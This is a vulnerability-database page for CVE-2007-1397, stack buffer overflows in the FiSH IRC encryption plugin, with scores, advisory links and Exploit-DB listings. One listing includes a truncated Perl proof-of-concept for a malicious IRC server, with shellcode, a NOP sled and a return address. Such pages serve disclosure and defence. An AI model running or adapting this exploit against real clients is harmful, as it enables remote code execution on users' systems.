CVE-2007-1397
published 2007-03-10CVE-2007-1397: Multiple stack-based buffer overflows in the (1) ExtractRnick and (2) decrypt_topic_332 functions in FiSH allow remote attackers to execute arbitrary code via…
PriorityP350critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
9.04%
94.6th percentile
Multiple stack-based buffer overflows in the (1) ExtractRnick and (2) decrypt_topic_332 functions in FiSH allow remote attackers to execute arbitrary code via long strings.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FiSH-irssi 0.99 - Evil ircd Buffer Overflow
exploitdb·2011-04-17·CVSS 10.0
CVE-2007-1397 [CRITICAL] FiSH-irssi 0.99 - Evil ircd Buffer Overflow
FiSH-irssi 0.99 - Evil ircd Buffer Overflow
---
# FiSH IRC encryption evil ircd PoC exploit.
# Abuses CVE-2007-1397
# Bad ircd, nasty bnc provider, nicknames over 100 char --> ruin.
# Runs arbitrary code which which in this case shuts down irssi.
# Tested on my own compiled FiSH with irssi/fedora/x86
# There are a lot more problems like this one, you should /unload fish
# Caleb James DeLisle - cjd
use Socket;
$retPtr = "\x60\xef\xff\xbf";
# Pirated from some guy called gunslinger_
$exit1code = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80";
$code = "\x90" x 120 . $exit1code . $retPtr;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket";
bind(SOCKET, sockaddr_in(6667, inet_aton("127.0.0.1"))) or die "Couldn't bind to port 6667";
listen(SOCKET,5) or die "Coul
Exploit-DB
FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities
exploitdb·2007-03-08·CVSS 10.0
CVE-2007-1397 [CRITICAL] FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities
FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities
---
source: https://www.securityfocus.com/bid/22880/info
FiSH is prone to multiple remote buffer-overflow vulnerabilities because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial of service.
# FiSH IRC encryption evil ircd PoC exploit.
# Abuses CVE-2007-1397
# Bad ircd, nasty bnc provider, nicknames over 100 char --> ruin.
# Runs arbitrary code which which in this case shuts down irssi.
# Tested on my own compiled FiSH with irssi/fedora/x86
# There are a lot more problems like this one, you should /unload f
No writeups or analysis indexed.
http://blogs.23.nu/ilja/stories/14493/http://secunia.com/advisories/24495http://securityreason.com/securityalert/8216http://www.securityfocus.com/bid/22880http://www.vupen.com/english/advisories/2007/0910https://exchange.xforce.ibmcloud.com/vulnerabilities/32892http://blogs.23.nu/ilja/stories/14493/http://secunia.com/advisories/24495http://securityreason.com/securityalert/8216http://www.securityfocus.com/bid/22880http://www.vupen.com/english/advisories/2007/0910https://exchange.xforce.ibmcloud.com/vulnerabilities/32892
2007-03-10
Published